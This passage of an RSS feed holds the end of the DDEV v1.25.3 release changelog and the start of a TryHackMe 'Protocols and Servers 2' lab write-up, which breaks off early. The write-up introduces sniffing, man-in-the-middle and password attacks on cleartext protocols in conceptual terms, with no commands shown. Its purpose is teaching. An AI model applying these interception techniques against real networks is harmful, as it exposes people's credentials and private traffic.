<li>fix(commands): correct case typo in <code>ddev sequelace</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733613998" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8521" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8521/hovercard" href="https://github.com/ddev/ddev/issues/8521">#8521</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733715228" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8522" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8522/hovercard" href="https://github.com/ddev/ddev/pull/8522">#8522</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mficzel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mficzel">@mficzel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733715228" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8522" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8522/hovercard" href="https://github.com/ddev/ddev/pull/8522">#8522</a></li>
<li>build(deps): bump moby and docker-compose by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736239790" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8523" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8523/hovercard" href="https://github.com/ddev/ddev/pull/8523">#8523</a></li>
<li>docs: skip codeberg, use stable link for docs in github workflows (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744327319" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8528" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8528/hovercard" href="https://github.com/ddev/ddev/pull/8528">#8528</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744327319" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8528" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8528/hovercard" href="https://github.com/ddev/ddev/pull/8528">#8528</a></li>
<li>build: remove pin for Node.js, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4557653464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8438" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8438/hovercard" href="https://github.com/ddev/ddev/pull/8438">#8438</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744191788" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8527" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8527/hovercard" href="https://github.com/ddev/ddev/pull/8527">#8527</a></li>
<li>fix(start): do not ask for poweroff with new ddev-ssh-agent, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4732526980" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8520" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8520/hovercard" href="https://github.com/ddev/ddev/issues/8520">#8520</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741864016" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8525" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8525/hovercard" href="https://github.com/ddev/ddev/pull/8525">#8525</a></li>
<li>ci(podman): update workflow for Podman 6 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741982501" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8526" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8526/hovercard" href="https://github.com/ddev/ddev/pull/8526">#8526</a></li>
<li>fix(podman): restrict keep-id userns to Linux only, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065154991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8223" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8223/hovercard" href="https://github.com/ddev/ddev/issues/8223">#8223</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744330972" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8529" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8529/hovercard" href="https://github.com/ddev/ddev/issues/8529">#8529</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727719482" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8516" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8516/hovercard" href="https://github.com/ddev/ddev/pull/8516">#8516</a></li>
<li>docs: Remove link to very old processwire thread (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4754222605" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8533" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8533/hovercard" href="https://github.com/ddev/ddev/pull/8533">#8533</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4754222605" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8533" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8533/hovercard" href="https://github.com/ddev/ddev/pull/8533">#8533</a></li>
<li>fix: continue when <code>#ddev-generated</code> is missing in generate config functions, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="636509327" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/2305" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/2305/hovercard" href="https://github.com/ddev/ddev/pull/2305">#2305</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753746905" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8532" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8532/hovercard" href="https://github.com/ddev/ddev/pull/8532">#8532</a></li>
<li>docs: Ignore winaero.com, cert expired [skip buildkite] (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768471904" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8537" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8537/hovercard" href="https://github.com/ddev/ddev/pull/8537">#8537</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768471904" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8537" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8537/hovercard" href="https://github.com/ddev/ddev/pull/8537">#8537</a></li>
<li>ci: add macOS Podman rootless Buildkite pipeline, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065154991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8223" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8223/hovercard" href="https://github.com/ddev/ddev/issues/8223">#8223</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4749045585" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8530" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8530/hovercard" href="https://github.com/ddev/ddev/pull/8530">#8530</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4749045585" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8530" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8530/hovercard" href="https://github.com/ddev/ddev/pull/8530">#8530</a></li>
<li>test(auth-ssh): harden ddevauthssh.expect against passphrase prompt race by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4767122944" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8536" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8536/hovercard" href="https://github.com/ddev/ddev/pull/8536">#8536</a></li>
<li>build: bump actions/cache from 5 to 6 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4769479389" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8538" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8538/hovercard" href="https://github.com/ddev/ddev/pull/8538">#8538</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4769479389" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8538" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8538/hovercard" href="https://github.com/ddev/ddev/pull/8538">#8538</a></li>
<li>fix: stop honoring XDG_CONFIG_HOME on Linux too, use DDEV_XDG_CONFIG_HOME, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694586960" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8493" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8493/hovercard" href="https://github.com/ddev/ddev/issues/8493">#8493</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752549694" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8531" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8531/hovercard" href="https://github.com/ddev/ddev/pull/8531">#8531</a></li>
<li>fix: correct typos in global and project config comment docs (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4780672518" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8541" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8541/hovercard" href="https://github.com/ddev/ddev/pull/8541">#8541</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4780672518" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8541" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8541/hovercard" href="https://github.com/ddev/ddev/pull/8541">#8541</a></li>
<li>test: fix TestCheckForMultipleGlobalDdevDirs on Windows, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752549694" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8531" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8531/hovercard" href="https://github.com/ddev/ddev/pull/8531">#8531</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785182644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8542" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8542/hovercard" href="https://github.com/ddev/ddev/pull/8542">#8542</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785182644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8542" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8542/hovercard" href="https://github.com/ddev/ddev/pull/8542">#8542</a></li>
<li>feat: add x-ddev.omit-ddev-labels to skip com.ddev.* label injection, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390914107" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8389" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8389/hovercard" href="https://github.com/ddev/ddev/issues/8389">#8389</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4778206278" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8540" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8540/hovercard" href="https://github.com/ddev/ddev/pull/8540">#8540</a></li>
<li>build(docker): bump images to v1.25.3 for release, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785709464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8544" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8544/hovercard" href="https://github.com/ddev/ddev/issues/8544">#8544</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787726460" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8547" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8547/hovercard" href="https://github.com/ddev/ddev/pull/8547">#8547</a></li>
<li>ci(buildkite): trim podman machine and run maintenance post-test (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4795142426" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8551" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8551/hovercard" href="https://github.com/ddev/ddev/pull/8551">#8551</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4795142426" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8551" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8551/hovercard" href="https://github.com/ddev/ddev/pull/8551">#8551</a></li>
<li>docs(typo3): require Camino theme, drop empty distribution prompt (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4789962878" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8548" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8548/hovercard" href="https://github.com/ddev/ddev/pull/8548">#8548</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4789962878" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8548" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8548/hovercard" href="https://github.com/ddev/ddev/pull/8548">#8548</a></li>
<li>docs(hosting): add guidance for Let's Encrypt failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonpugh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonpugh">@jonpugh</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785496062" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8543" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8543/hovercard" href="https://github.com/ddev/ddev/pull/8543">#8543</a></li>
<li>docs(docker): add Podman and Docker rootless setup, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549338538" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8434" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8434/hovercard" href="https://github.com/ddev/ddev/issues/8434">#8434</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4797374506" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8552" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8552/hovercard" href="https://github.com/ddev/ddev/pull/8552">#8552</a></li>
<li>ci(macos): untap pre-installed aws/tap before brew install by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4809536273" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8559" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8559/hovercard" href="https://github.com/ddev/ddev/pull/8559">#8559</a></li>
<li>docs(wsl2): use Ubuntu-26.04 instead of Ubuntu-24.04, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276951921" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8326" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8326/hovercard" href="https://github.com/ddev/ddev/issues/8326">#8326</a>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4436512981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8408" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8408/hovercard" href="https://github.com/ddev/ddev/pull/8408">#8408</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4802996009" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8553" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8553/hovercard" href="https://github.com/ddev/ddev/pull/8553">#8553</a></li>
<li>fix(webserver): restore nonstandard router port in HTTP_HOST for nginx-fpm, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4806198523" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8554" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8554/hovercard" href="https://github.com/ddev/ddev/issues/8554">#8554</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4806397840" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8555" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8555/hovercard" href="https://github.com/ddev/ddev/pull/8555">#8555</a></li>
<li>fix(router): temp pin for traefik:3.6.13, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4820038987" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8562" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8562/hovercard" href="https://github.com/ddev/ddev/issues/8562">#8562</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4821494411" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8564" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8564/hovercard" href="https://github.com/ddev/ddev/pull/8564">#8564</a></li>
<li>fix(shopware): pin Twig &lt;3.28 to work around admin HTTP 500 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4807420317" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8557" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8557/hovercard" href="https://github.com/ddev/ddev/pull/8557">#8557</a></li>
<li>docs: add TYPO3 special handling for <code>ddev share</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3594892063" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7799" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7799/hovercard" href="https://github.com/ddev/ddev/issues/7799">#7799</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4806999999" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8556" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8556/hovercard" href="https://github.com/ddev/ddev/pull/8556">#8556</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/silverham/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/silverham">@silverham</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355742321" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8368" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8368/hovercard" href="https://github.com/ddev/ddev/pull/8368">#8368</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CallMeLeon167/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CallMeLeon167">@CallMeLeon167</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375346339" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8384" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8384/hovercard" href="https://github.com/ddev/ddev/pull/8384">#8384</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mikee-3000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mikee-3000">@Mikee-3000</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372014245" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8383" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8383/hovercard" href="https://github.com/ddev/ddev/pull/8383">#8383</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wolcen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wolcen">@wolcen</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4441784873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8412" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8412/hovercard" href="https://github.com/ddev/ddev/pull/8412">#8412</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chx">@chx</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494536198" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8420" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8420/hovercard" href="https://github.com/ddev/ddev/pull/8420">#8420</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mficzel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mficzel">@mficzel</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733715228" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8522" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8522/hovercard" href="https://github.com/ddev/ddev/pull/8522">#8522</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonpugh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonpugh">@jonpugh</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785496062" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8543" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8543/hovercard" href="https://github.com/ddev/ddev/pull/8543">#8543</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.25.2...v1.25.3"><tt>v1.25.2...v1.25.3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Protocols and Servers 2 TryHackMe Writeup]]></title>
<description><![CDATA[Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.No exploit. No zero-day. Just a protocol that was never built to keep a secret.That’s the uncomfortable little truth this room is built around. So le...]]></description>
<link>https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/900/1*7OqFQcrh6OcgOZyqGjAyqw.png"></figure><p>No exploit. No zero-day. Just a protocol that was never built to keep a secret.</p><p>That’s the uncomfortable little truth this room is built around. So let’s pull it apart.</p><p>Most of the internet’s classic protocols were designed in a more trusting era. It was a time when the people sharing a network mostly knew each other, and “someone might be listening” wasn’t the default assumption.</p><p>Those protocols still run everywhere. And many of them still send your credentials across the wire in plain text.</p><p><strong>Protocols and Servers 2</strong> on TryHackMe is about exactly that gap, and what closes it. It walks through three foundational attacks against network protocols, then the defenses that neutralize each one:</p><ul><li>Sniffing — quietly reading traffic off the wire</li><li>Man-in-the-Middle (MITM) — sitting between two parties and tampering</li><li>Password attacks — guessing or cracking the credentials themselves</li></ul><p>This is a writeup of the whole room: the concepts in plain language, the commands that matter, and the task answers explained. If you’re working through it yourself, follow along.</p><blockquote>One idea ties the entire room together: cleartext protocols are insecure by design. Everything else is a consequence of that single fact.</blockquote><h3>Part 1 — Sniffing Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/911/1*mxa7u-z6cA7UEL5f8tjJQg.png"></figure><p>A <strong>sniffing attack</strong> is the simplest idea in the room: use a packet-capture tool to grab traffic as it crosses the network, then read it.</p><p>If a protocol talks in cleartext, anyone positioned to see that traffic can pull out private messages or login credentials. Nothing is encrypted before it leaves your machine.</p><pre>"Isn't everything encrypted now?"</pre><p>It’s tempting to think sniffing is a solved, retro problem now that TLS is everywhere. It isn’t. It stays dangerous wherever cleartext still lives:</p><ul><li><strong>Internal corporate networks</strong>, where machine-to-machine traffic is often left unencrypted</li><li><strong>Legacy systems </strong>like old mail servers, embedded devices, and industrial control systems</li><li><strong>Misconfigured services</strong> where TLS is available but not strictly enforced</li><li><strong>IoT devices</strong> that habitually use plain protocols</li><li><strong>Wireless networks</strong>, where anyone in range can listen</li><li>After a MITM attack that has successfully downgraded or stripped encryption</li></ul><blockquote>In real internal pentests and red-team work, sniffing is still one 